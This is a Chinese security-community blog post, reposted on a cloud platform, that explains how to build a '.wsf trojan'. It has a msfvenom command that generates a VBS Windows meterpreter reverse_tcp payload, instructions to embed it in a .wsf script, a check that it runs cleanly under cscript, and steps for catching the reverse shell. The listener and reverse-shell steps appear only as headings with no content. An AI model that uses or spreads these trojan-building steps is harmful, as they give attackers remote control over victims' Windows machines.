前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >msf 生成.wsf 木马

msf 生成.wsf 木马

作者头像
用户1631416
发布2019-03-06 14:46:18
1.6K0
发布2019-03-06 14:46:18
举报
文章被收录于专栏:玄魂工作室玄魂工作室

本文由玄魂工作室--安全群 嘉宾“江河” 提供。

前天在群里问了如何生成.wsf msf马,今天写出了实例,分享出来,同时期待亮神的佳作。

首先了解wsf是啥语言,可参考文章如下:

https://www.cnblogs.com/vitrox/p/5137441.html

https://blog.csdn.net/leyvan/article/details/3746683

http://book.51cto.com/art/201111/300472.htm

wsf脚本语言是Windows 脚本文件,是含有可扩展标记语言 (XML),支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路

1)学习.wsf脚本格式

2)msf生成vbs

3) msf生成vbs插入.wsf脚本格式

4)尝试运行查看是否报错

5)反弹shell

开始制作脚本:

1) .wsf脚本格式

<package><job id="IncludeExample"> <script language="VBScript"> </script></job></package>

2) msf生成vbs

代码语言:javascript
复制
msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

3) msf生成vbs插入.wsf脚本中

4)尝试运行无查看是否报错:

直接运行无报错

使用cscript.exe (WindowsScript Host引擎),运行无报错:

5)反弹shell

监听:

反弹:

知识补充:

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档